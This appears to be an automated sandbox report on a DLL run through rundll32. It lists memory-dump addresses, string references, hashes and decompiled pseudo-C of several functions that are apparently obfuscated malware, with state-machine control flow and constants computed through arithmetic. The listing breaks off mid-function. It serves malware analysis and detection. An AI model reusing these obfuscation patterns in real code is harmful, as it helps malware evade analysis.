0x100018d8
0x100018e0
0x100018ed
0x100018f1
0x100018f9
0x10001901
0x10001909
0x10001911
0x10001919
0x10001921
0x1000192c
0x10001937
0x10001942
0x10001952
0x10001956
0x1000195e
0x1000196b
0x1000196e
0x10001972
0x1000197a
0x1000197f
0x10001987
0x10001994
0x100019a0
0x100019a8
0x100019ad
0x100019b3
0x100019bb
0x100019c3
0x100019c7
0x100019d3
0x100019d6
0x100019da
0x100019e2
0x100019ea
0x100019ef
0x100019f7
0x100019ff
0x100019ff
0x100019ff
0x10001a04
0x10001a04
0x10001a04
0x10001a09
0x00000000
0x10001a09
0x10001a17
0x10001b3c
0x10001b41
0x10001b44
0x10001b47
0x10001b4e
0x10001b53
0x10001b58
0x00000000
0x10001b58
0x10001a23
0x10001aff
0x10001b04
0x10001b07
0x10001b0a
0x10001b11
0x10001b16
0x10001a04
0x10001a04
0x00000000
0x10001a04
0x10001a2f
0x10001a89
0x10001a94
0x10001a99
0x10001a9d
0x10001a9f
0x10001ae3
0x10001aa1
0x10001ab4
0x10001ad1
0x10001ad6
0x10001ad9
0x10001ad9
0x100019ff
0x100019ff
0x100019ff
0x00000000
0x100019ff
0x100019ff
0x10001a37
0x00000000
0x10001bab
0x10001a43
0x10001a6b
0x10001a6e
0x10001a6f
0x10001a74
0x10001a77
0x10001a79
0x10001bb5
0x10001bb5
0x10001a7f
0x00000000
0x10001a7f
0x10001a47
0x00000000
0x00000000
0x10001a4d
0x10001a50
0x10001a55
0x10001a58
0x00000000
0x10001a58
0x10001b71
0x10001b78
0x10001b7d
0x10001b82
0x10001b87
0x10001b87
0x10001b87
0x00000000
0x10001a09
0x10001a04

Strings

`, xrefs: 100017C6
+{, xrefs: 10001956
j, xrefs: 100016AE
K", xrefs: 100018E8
K", xrefs: 100018F1
., xrefs: 1000189B
Ln8^, xrefs: 100019EF
tC, xrefs: 100019BB

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$+{$.$K"$K"$Ln8^$tC$`
API String ID: 0-3859911108
Opcode ID: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
Instruction ID: 31beb1e1d2509969b8c97709e2d0e8827b8fffe3f774f18c97f02cb453e1c763
Opcode Fuzzy Hash: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
Instruction Fuzzy Hash: D9D142715083819FE398CF25C48A40BFBE1FBC4788F108A1EF5999A2A4D7B5D945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001D530, Relevance: 10.3, Strings: 8, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001D530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				char _t277;
				void* _t302;
				void* _t313;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				intOrPtr _t353;
				signed int* _t356;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				_t277 = E100056B2(0);
				_v72 = _t277;
				_t353 = _t277;
				_v140 = 0xcf77;
				_t356 =  &(( &_v180)[0xa]);
				_v140 = _v140 | 0x06dd099f;
				_v140 = _v140 ^ 0x2b3fcad2;
				_t313 = 0x28b49c8b;
				_v140 = _v140 ^ 0x2de2012d;
				_v164 = 0xc4bc;
				_v164 = _v164 << 9;
				_t344 = 9;
				_v164 = _v164 * 0x2c;
				_v164 = _v164 / _t344;
				_v164 = _v164 ^ 0x0783a020;
				_v112 = 0x2b8e;
				_v112 = _v112 + 0xffffae8b;
				_t345 = 0x76;
				_v112 = _v112 * 0x7c;
				_v112 = _v112 ^ 0xffedb6fa;
				_v144 = 0xac6;
				_v144 = _v144 / _t345;
				_t346 = 0x7c;
				_v144 = _v144 / _t346;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x00001557;
				_v152 = 0xab69;
				_v152 = _v152 + 0xa2f;
				_v152 = _v152 >> 5;
				_v152 = _v152 + 0xffff79cf;
				_v152 = _v152 ^ 0xffff27b1;
				_v108 = 0x73cc;
				_v108 = _v108 + 0x480f;
				_t347 = 0x59;
				_v108 = _v108 / _t347;
				_v108 = _v108 ^ 0x000020fd;
				_v100 = 0x373b;
				_v100 = _v100 * 0x66;
				_v100 = _v100 ^ 0x0016182c;
				_v104 = 0xe7a6;
				_v104 = _v104 ^ 0xf29de3d2;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x000f640c;
				_v88 = 0x7bd1;
				_v88 = _v88 + 0xffff741d;
				_v88 = _v88 ^ 0xffffa91a;
				_v80 = 0x1764;
				_t348 = 0x17;
				_v80 = _v80 / _t348;
				_v80 = _v80 ^ 0x00004d9b;
				_v168 = 0x40e5;
				_v168 = _v168 | 0x95416268;
				_v168 = _v168 + 0xffffdda2;
				_t349 = 0x3d;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x761d93b5;
				_v176 = 0x5c39;
				_v176 = _v176 << 3;
				_v176 = _v176 ^ 0x82f9fe57;
				_v176 = _v176 + 0xf301;
				_v176 = _v176 ^ 0x82fc4bf9;
				_v180 = 0x8c1a;
				_v180 = _v180 / _t349;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 + 0x261d;
				_v180 = _v180 ^ 0x00004a95;
				_v124 = 0xc582;
				_t350 = 0x1d;
				_v124 = _v124 * 0x1f;
				_v124 = _v124 | 0xf6103699;
				_v124 = _v124 ^ 0xf617990a;
				_v156 = 0xd28e;
				_v156 = _v156 | 0xfa81b7f3;
				_v156 = _v156 << 9;
				_v156 = _v156 / _t350;
				_v156 = _v156 ^ 0x0022cbe3;
				_v96 = 0x6edc;
				_v96 = _v96 ^ 0x578c8574;
				_v96 = _v96 ^ 0x578c878c;
				_v172 = 0x2912;
				_t351 = 0x52;
				_v172 = _v172 * 0x42;
				_v172 = _v172 + 0xffffd848;
				_v172 = _v172 ^ 0xff29ff1d;
				_v172 = _v172 ^ 0xff239d47;
				_v116 = 0x4964;
				_v116 = _v116 + 0xffff6a3d;
				_v116 = _v116 << 8;
				_v116 = _v116 ^ 0xffb3a2b5;
				_v148 = 0x2770;
				_v148 = _v148 | 0xc18e9b46;
				_v148 = _v148 + 0xd34e;
				_v148 = _v148 | 0xf482d9fb;
				_v148 = _v148 ^ 0xf58f8d3b;
				_v76 = 0x8840;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x00221890;
				_v160 = 0xa0de;
				_v160 = _v160 / _t351;
				_v160 = _v160 + 0x938c;
				_v160 = _v160 + 0xffff507f;
				_v160 = _v160 ^ 0xffff887d;
				_v120 = 0xf500;
				_v120 = _v120 + 0xffff51ff;
				_v120 = _v120 * 0x5a;
				_v120 = _v120 ^ 0x0018abed;
				_v128 = 0xf1ed;
				_v128 = _v128 | 0x9ee1ceb0;
				_v128 = _v128 + 0xfdb4;
				_v128 = _v128 ^ 0x9ee2bb44;
				_v132 = 0xb4e7;
				_v132 = _v132 + 0x6d7b;
				_v132 = _v132 ^ 0xeb6cebb2;
				_v132 = _v132 ^ 0xeb6d8bab;
				_v136 = 0x4487;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 | 0x68b8f7cc;
				_v136 = _v136 ^ 0x68b888c6;
				_v84 = 0xd92;
				_v84 = _v84 + 0xffffee93;
				_v84 = _v84 ^ 0xfffffb14;
				_v92 = 0x6345;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x000649ac;
				do {
					while(_t313 != 0x36a85ef) {
						if(_t313 == 0x278fc742) {
							E10001CB3( &_v68, _v108, 0x44, _v100);
							_push(0x100013e0);
							_push(_v80);
							_t316 = _v104;
							_v68 = 0x44;
							_v60 = E1001BF25(_v104, _v88, __eflags);
							_t353 = E10009BEB(_v168, _a20, _v72, _v104, _v176, _v180, _v164 | _v140, _a28, _t316, _t316,  &_v68, 0, _v124, _v156, _v96, _t316, _v172, _v116, _v148, _v76, _a8);
							E1001C5F7(_v160, _v120, _v128, _v132, _v60);
							_t356 =  &(_t356[0x1a]);
							_t313 = 0x2f47876d;
							continue;
						} else {
							if(_t313 == 0x28b49c8b) {
								_t313 = 0x36a85ef;
								continue;
							} else {
								if(_t313 != 0x2f47876d) {
									goto L12;
								} else {
									E1001B11F(_v136, _v72, _v84, _v92);
								}
							}
						}
						L6:
						return _t353;
					}
					_t302 = E10003A7E(_v112, _v144, _t313,  &_v72, _v152, _a28);
					_t356 =  &(_t356[4]);
					__eflags = _t302;
					if(_t302 == 0) {
						_t313 = 0x349a93df;
						goto L12;
					} else {
						_t313 = 0x278fc742;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t313 - 0x349a93df;
				} while (_t313 != 0x349a93df);
				goto L6;
			}

0x1001d53a
0x1001d543
0x1001d54a
0x1001d551
0x1001d558
0x1001d55f
0x1001d566
0x1001d56d
0x1001d574
0x1001d575
0x1001d576
0x1001d57b
0x1001d582
0x1001d584
0x1001d58c
0x1001d58f
0x1001d599
0x1001d5a1
0x1001d5a6
0x1001d5ae
0x1001d5b6
0x1001d5c2
0x1001d5c5
0x1001d5d1
0x1001d5d5
0x1001d5dd
0x1001d5e5
0x1001d5f2
0x1001d5f5
0x1001d5f9
0x1001d601
0x1001d611
0x1001d619
0x1001d61e
0x1001d624
0x1001d629
0x1001d631
0x1001d639
0x1001d641
0x1001d646
0x1001d64e
0x1001d656
0x1001d65e
0x1001d66a
0x1001d66d
0x1001d671
0x1001d679
0x1001d686
0x1001d68a
0x1001d692
0x1001d69a
0x1001d6a2
0x1001d6a7
0x1001d6af
0x1001d6b7
0x1001d6bf
0x1001d6c7
0x1001d6d7
0x1001d6dc
0x1001d6e2
0x1001d6ea
0x1001d6f2
0x1001d6fa
0x1001d707
0x1001d70a
0x1001d70e
0x1001d716
0x1001d71e
0x1001d723
0x1001d72b
0x1001d733
0x1001d73b
0x1001d74b
0x1001d74f
0x1001d754
0x1001d75c
0x1001d764
0x1001d771
0x1001d774
0x1001d778
0x1001d780
0x1001d788
0x1001d790
0x1001d798
0x1001d7a5
0x1001d7a9
0x1001d7b1
0x1001d7b9
0x1001d7c1
0x1001d7c9
0x1001d7d6
0x1001d7d7
0x1001d7db
0x1001d7e3
0x1001d7eb
0x1001d7f3
0x1001d7fb
0x1001d803
0x1001d808
0x1001d810
0x1001d818
0x1001d820
0x1001d828
0x1001d830
0x1001d838
0x1001d840
0x1001d845
0x1001d84d
0x1001d85b
0x1001d85f
0x1001d867
0x1001d86f
0x1001d877
0x1001d87f
0x1001d88c
0x1001d890
0x1001d898
0x1001d8a0
0x1001d8a8
0x1001d8b5
0x1001d8c2
0x1001d8cf
0x1001d8d7
0x1001d8df
0x1001d8e7
0x1001d8ef
0x1001d8f4
0x1001d8fc
0x1001d904
0x1001d90c
0x1001d914
0x1001d91c
0x1001d924
0x1001d929
0x1001d931
0x1001d931
0x1001d93b
0x1001d98d
0x1001d992
0x1001d997
0x1001d9a2
0x1001d9a6
0x1001d9c0
0x1001da27
0x1001da42
0x1001da47
0x1001da4a
0x00000000
0x1001d93d
0x1001d943
0x1001d978
0x00000000
0x1001d945
0x1001d94b
0x00000000
0x1001d951
0x1001d964
0x1001d96a
0x1001d94b
0x1001d943
0x1001d96c
0x1001d977
0x1001d977
0x1001da70
0x1001da75
0x1001da78
0x1001da7a
0x1001da83
0x00000000
0x1001da7c
0x1001da7c
0x00000000
0x1001da7c
0x00000000
0x1001da85
0x1001da85
0x1001da85
0x00000000

Strings

{m, xrefs: 1001D8CF
Ec, xrefs: 1001D91C
9\, xrefs: 1001D716
p', xrefs: 1001D810
dI, xrefs: 1001D7F3
D, xrefs: 1001D9A6
@, xrefs: 1001D6EA
;7, xrefs: 1001D679

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9\$;7$D$Ec$dI$p'${m$@
API String ID: 0-4186577645
Opcode ID: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
Instruction ID: 2df3e07cde59ac68a4d410155b42b42f4bafc48a528185daffa6966fbd240ac9
Opcode Fuzzy Hash: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
Instruction Fuzzy Hash: 95D100B15087819FE364CF65C88AA0FBBE1FBC4344F108A1DF6959A2A0D7B59945CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10018F65, Relevance: 10.2, Strings: 8, Instructions: 246
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10018F65() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t253;
				signed int _t254;
				void* _t256;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				void* _t273;
				void* _t279;
				void* _t305;
				signed int* _t309;

				_t309 =  &_v108;
				_v12 = 0x296bf2;
				_v4 = 0;
				_v8 = 0x4bf1e;
				_v100 = 0x2b2b;
				_v100 = _v100 >> 2;
				_v100 = _v100 ^ 0x417d2759;
				_v16 = 0;
				_t10 =  &_v100; // 0x417d2759
				_v100 =  *_t10 * 0x44;
				_t305 = 0x7c03eab;
				_v100 = _v100 ^ 0xe5401b0d;
				_v76 = 0xb627;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0xc3e66578;
				_v76 = _v76 ^ 0xc3e6657f;
				_v104 = 0x24d5;
				_v104 = _v104 + 0x5447;
				_t265 = 0x57;
				_v104 = _v104 / _t265;
				_t266 = 0x28;
				_v104 = _v104 * 0x32;
				_v104 = _v104 ^ 0x000071f7;
				_v40 = 0x5f61;
				_v40 = _v40 + 0xd6ed;
				_v40 = _v40 ^ 0x000138b6;
				_v108 = 0x6b22;
				_v108 = _v108 * 0x6c;
				_v108 = _v108 << 8;
				_v108 = _v108 + 0x6d5c;
				_v108 = _v108 ^ 0x2d328325;
				_v92 = 0x5cf3;
				_v92 = _v92 | 0xe469743c;
				_v92 = _v92 ^ 0x31335b62;
				_v92 = _v92 >> 6;
				_v92 = _v92 ^ 0x0355473e;
				_v64 = 0xc70a;
				_v64 = _v64 + 0xfffff4c9;
				_v64 = _v64 ^ 0x3b15d897;
				_v64 = _v64 ^ 0x3b156e76;
				_v68 = 0xfd7d;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x951;
				_v68 = _v68 ^ 0x00007938;
				_v96 = 0x3fdb;
				_t267 = 0x66;
				_v96 = _v96 / _t267;
				_v96 = _v96 | 0x3c76ff0b;
				_t268 = 0x58;
				_v96 = _v96 * 0x45;
				_v96 = _v96 ^ 0x4c12cf42;
				_v72 = 0x1a5;
				_v72 = _v72 | 0xb959885f;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000bb2ca;
				_v36 = 0x7797;
				_v36 = _v36 / _t268;
				_v36 = _v36 ^ 0x0000700b;
				_v28 = 0xb618;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x005b051c;
				_v88 = 0xdec6;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x6f8cff66;
				_t269 = 0x11;
				_t262 = _v16;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 ^ 0xfcf5e555;
				_v32 = 0xe4b;
				_v32 = _v32 + 0x98e4;
				_v32 = _v32 ^ 0x00008bfc;
				_v60 = 0xce72;
				_v60 = _v60 >> 3;
				_v60 = _v60 | 0xda3ba74b;
				_v60 = _v60 ^ 0xda3bee01;
				_v48 = 0x9d97;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x000028e0;
				_v52 = 0x36fc;
				_t270 = 0x70;
				_v52 = _v52 / _t269;
				_v52 = _v52 * 0x6a;
				_v52 = _v52 ^ 0x00012e7b;
				_v56 = 0x3c40;
				_t271 = 0x4a;
				_v56 = _v56 / _t270;
				_v56 = _v56 / _t271;
				_v56 = _v56 ^ 0x000051af;
				_v84 = 0xe49b;
				_v84 = _v84 + 0xffff8d97;
				_t272 = 0x31;
				_v84 = _v84 * 0x39;
				_v84 = _v84 * 0x73;
				_v84 = _v84 ^ 0x0b6c29a9;
				_v24 = 0x471e;
				_v24 = _v24 | 0xb0cec10e;
				_v24 = _v24 ^ 0xb0cea202;
				_v44 = 0x7985;
				_v44 = _v44 * 0x70;
				_v44 = _v44 + 0xffff691b;
				_v44 = _v44 ^ 0x003485fc;
				_v80 = 0x185c;
				_t273 = 0x5c;
				_v80 = _v80 / _t272;
				_v80 = _v80 | 0x649be726;
				_v80 = _v80 + 0x7856;
				_v80 = _v80 ^ 0x649c793b;
				while(1) {
					L1:
					_t253 = 0xe31e6;
					do {
						while(_t305 != _t253) {
							if(_t305 == 0x7c03eab) {
								_t305 = 0x2ddc9b72;
								continue;
							} else {
								if(_t305 == 0x152cdf9c) {
									_push(0x10001080);
									_push(_v108);
									_t256 = E1001BF25(_v104, _v40, __eflags);
									_pop(_t279);
									__eflags = E10013659(_v92, _v64, _v68, _v96, _v72, _t279,  &_v20, _v36, _t279, _t279, _t256, _t279, _v76, _v100);
									_t305 =  ==  ? 0xe31e6 : 0x7d7e766;
									E1001C5F7(_v28, _v88, _v32, _v60, _t256);
									_t309 =  &(_t309[0x10]);
									L16:
									_t253 = 0xe31e6;
									_t273 = 0x5c;
									goto L17;
								} else {
									if(_t305 == 0x2ddc9b72) {
										_t264 =  *0x100221b0 + 0x10;
										while(1) {
											__eflags =  *_t264 - _t273;
											if(__eflags == 0) {
												break;
											}
											_t264 = _t264 + 2;
											__eflags = _t264;
										}
										_t262 = _t264 + 2;
										_t305 = 0x152cdf9c;
										goto L1;
									} else {
										if(_t305 != 0x32e2c3ea) {
											goto L17;
										} else {
											E10015483(_v24, _v44, _v80, _v20);
										}
									}
								}
							}
							L8:
							return _v16;
						}
						_t254 = E100079A2(_t262, _v48, _v52, _v56, _v84, _v20);
						_t309 =  &(_t309[4]);
						__eflags = _t254;
						_t305 = 0x32e2c3ea;
						_t225 = _t254 == 0;
						__eflags = _t225;
						_v16 = 0 | _t225;
						goto L16;
						L17:
						__eflags = _t305 - 0x7d7e766;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x10018f65
0x10018f68
0x10018f72
0x10018f78
0x10018f80
0x10018f88
0x10018f8d
0x10018f95
0x10018f99
0x10018fa2
0x10018fa6
0x10018fab
0x10018fb3
0x10018fbb
0x10018fc0
0x10018fc8
0x10018fd0
0x10018fd8
0x10018fe6
0x10018feb
0x10018ff6
0x10018ff9
0x10018ffd
0x10019005
0x1001900d
0x10019015
0x1001901d
0x1001902a
0x1001902e
0x10019033
0x1001903b
0x10019043
0x1001904b
0x10019053
0x1001905b
0x10019060
0x10019068
0x10019070
0x10019078
0x10019080
0x10019088
0x10019098
0x1001909c
0x100190a4
0x100190ac
0x100190b8
0x100190bd
0x100190c3
0x100190d0
0x100190d1
0x100190d5
0x100190dd
0x100190e5
0x100190ed
0x100190f2
0x100190fa
0x10019108
0x1001910c
0x10019114
0x1001911e
0x10019128
0x10019130
0x10019138
0x1001913d
0x1001914c
0x1001914f
0x10019153
0x10019157
0x1001915f
0x10019167
0x1001916f
0x10019177
0x1001917f
0x10019184
0x1001918c
0x10019194
0x1001919c
0x100191a1
0x100191a5
0x100191ad
0x100191bb
0x100191bc
0x100191c9
0x100191cd
0x100191d5
0x100191e3
0x100191e4
0x100191f2
0x100191f8
0x10019200
0x10019208
0x10019215
0x10019218
0x10019221
0x10019225
0x1001922d
0x10019235
0x1001923d
0x10019245
0x10019252
0x10019256
0x1001925e
0x10019266
0x10019274
0x10019275
0x10019279
0x10019281
0x10019289
0x10019291
0x10019291
0x10019291
0x10019296
0x10019296
0x100192a4
0x10019378
0x00000000
0x100192aa
0x100192ac
0x100192ff
0x10019304
0x10019310
0x10019316
0x1001934d
0x1001936b
0x1001936e
0x10019373
0x100193b0
0x100193b2
0x100193b7
0x00000000
0x100192ae
0x100192b4
0x100192eb
0x100192f3
0x100192f3
0x100192f6
0x00000000
0x00000000
0x100192f0
0x100192f0
0x100192f0
0x100192f8
0x100192fb
0x00000000
0x100192b6
0x100192bc
0x00000000
0x100192c2
0x100192d2
0x100192d8
0x100192bc
0x100192b4
0x100192ac
0x100192d9
0x100192e4
0x100192e4
0x10019398
0x1001939f
0x100193a2
0x100193a4
0x100193a9
0x100193a9
0x100193ac
0x00000000
0x100193b8
0x100193b8
0x100193b8
0x00000000
0x100193c4

Strings

8y, xrefs: 100190A4
Vx, xrefs: 10019281
a_, xrefs: 10019005
(, xrefs: 100191A5
\m, xrefs: 10019033
Y'}A, xrefs: 10018F99
b[31, xrefs: 10019053
@<, xrefs: 100191D5

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8y$@<$Vx$Y'}A$\m$a_$b[31$(
API String ID: 0-4115005019
Opcode ID: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
Instruction ID: 8b0e813e3e5c3b84958ad50093081c7edbab459e4345c4ad5d1788e5b52fe82d
Opcode Fuzzy Hash: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
Instruction Fuzzy Hash: 65B1FF715083409FE358CF25C98A90BBBE2FBC5748F10891DF1999A2A0D7B9DA498F46

Uniqueness

Uniqueness Score: -1.00%

Function 10003D4E, Relevance: 10.2, Strings: 8, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10003D4E(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t231;
				intOrPtr _t232;
				intOrPtr* _t233;
				intOrPtr* _t236;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				intOrPtr* _t269;
				void* _t270;
				void* _t272;
				signed int* _t273;

				_t273 =  &_v112;
				_v72 = 0x5582;
				_v72 = _v72 >> 1;
				_t272 = __edx;
				_t243 = __ecx;
				_t269 = 0;
				_t245 = 0x51;
				_v72 = _v72 / _t245;
				_v72 = _v72 ^ 0x0000601c;
				_t270 = 0x1322e1ec;
				_v36 = 0xc7c9;
				_v36 = _v36 | 0xbc8756ca;
				_v36 = _v36 ^ 0xbc8791da;
				_v56 = 0xdb25;
				_v56 = _v56 + 0xa75d;
				_v56 = _v56 ^ 0x0001a8e8;
				_v112 = 0xc6db;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 + 0xd338;
				_v112 = _v112 ^ 0x0000d633;
				_v76 = 0xc37;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xce4966ab;
				_v76 = _v76 ^ 0xce4936b0;
				_v108 = 0xb399;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 1;
				_v108 = _v108 | 0x0148f084;
				_v108 = _v108 ^ 0x59ccb068;
				_v80 = 0xaa79;
				_v80 = _v80 + 0x2a7d;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x0000706a;
				_v52 = 0x1cb3;
				_v52 = _v52 | 0xdfdf2f63;
				_v52 = _v52 ^ 0xdfdf2d78;
				_v40 = 0x2796;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x004f7581;
				_v44 = 0x2f1a;
				_t246 = 0x64;
				_v44 = _v44 / _t246;
				_v44 = _v44 ^ 0x0000485d;
				_v48 = 0x187a;
				_v48 = _v48 + 0x126d;
				_v48 = _v48 ^ 0x000074b0;
				_v104 = 0x9317;
				_v104 = _v104 >> 8;
				_v104 = _v104 << 5;
				_v104 = _v104 + 0xe504;
				_v104 = _v104 ^ 0x0000e32e;
				_v100 = 0xf551;
				_v100 = _v100 ^ 0x5a167e7d;
				_v100 = _v100 >> 7;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 ^ 0x00000292;
				_v28 = 0x87ec;
				_v28 = _v28 + 0xffffd24f;
				_v28 = _v28 ^ 0x00002fae;
				_v32 = 0x1a62;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x000d761f;
				_v68 = 0x4d45;
				_v68 = _v68 + 0xffff90af;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fff89e8;
				_v12 = 0x8a80;
				_v12 = _v12 | 0x7f7c99ee;
				_v12 = _v12 ^ 0x7f7cab2a;
				_v16 = 0x19cc;
				_v16 = _v16 + 0xffff6b5c;
				_v16 = _v16 ^ 0xfffffdf7;
				_v20 = 0x88ed;
				_v20 = _v20 | 0x3d0cae91;
				_v20 = _v20 ^ 0x3d0caeb7;
				_v24 = 0xdb7;
				_v24 = _v24 + 0xffffd9aa;
				_v24 = _v24 ^ 0xffffae78;
				_v96 = 0xd89d;
				_v96 = _v96 ^ 0x4d812d2a;
				_v96 = _v96 << 0xd;
				_v96 = _v96 << 2;
				_v96 = _v96 ^ 0xfadb9b11;
				_v60 = 0x63dc;
				_t247 = 0x73;
				_v60 = _v60 * 0x5f;
				_v60 = _v60 ^ 0x00257e00;
				_v64 = 0xaca0;
				_v64 = _v64 + 0x1639;
				_v64 = _v64 ^ 0x0000d793;
				_v84 = 0x1d64;
				_v84 = _v84 * 0x49;
				_v84 = _v84 + 0x2f18;
				_v84 = _v84 ^ 0x0008f6d2;
				_v4 = 0xa1b0;
				_v4 = _v4 + 0xca2d;
				_v4 = _v4 ^ 0x000177a9;
				_v88 = 0xa1e4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 + 0x87da;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x0043e3cc;
				_v8 = 0x4904;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x001263b3;
				_v92 = 0x6a47;
				_v92 = _v92 + 0xffffd61f;
				_v92 = _v92 + 0xffffa4a6;
				_v92 = _v92 / _t247;
				_v92 = _v92 ^ 0x02399718;
				while(1) {
					L1:
					_t231 = 0xbbd3b0e;
					do {
						L2:
						while(_t270 != _t231) {
							if(_t270 == 0x11fd89d0) {
								_t247 = _v100;
								_t233 = E10008997(_t247, _v28, _v32, _v68,  *_t269);
								_t273 =  &(_t273[3]);
								 *((intOrPtr*)(_t269 + 0x1c)) = _t233;
								__eflags = _t233;
								_t231 = 0xbbd3b0e;
								_t270 =  !=  ? 0xbbd3b0e : 0x2e937f96;
								continue;
							}
							if(_t270 != 0x1322e1ec) {
								if(_t270 == 0x17e19405) {
									return E100091CD(_v4, _v88, _v8, _t269, _v92);
								}
								if(_t270 == 0x25daab44) {
									 *((intOrPtr*)(_t269 + 0x20)) = _t243;
									_t238 =  *0x10021400; // 0x0
									 *((intOrPtr*)(_t269 + 0x10)) = _t238;
									 *0x10021400 = _t269;
									return _t238;
								}
								if(_t270 == 0x29623426) {
									_push(_v112);
									_t239 = E10005BE1(_v56, _t272, __eflags, _t247);
									 *_t269 = _t239;
									_pop(_t247);
									__eflags = _t239;
									if(__eflags == 0) {
										goto L10;
									} else {
										E100039D1(_v108, _v80,  *_t269, _v52, _t239);
										_t247 = _v40;
										E100056B3(_v44, _v48,  *_t269, _v104);
										_t273 =  &(_t273[7]);
										_t270 = 0x11fd89d0;
										while(1) {
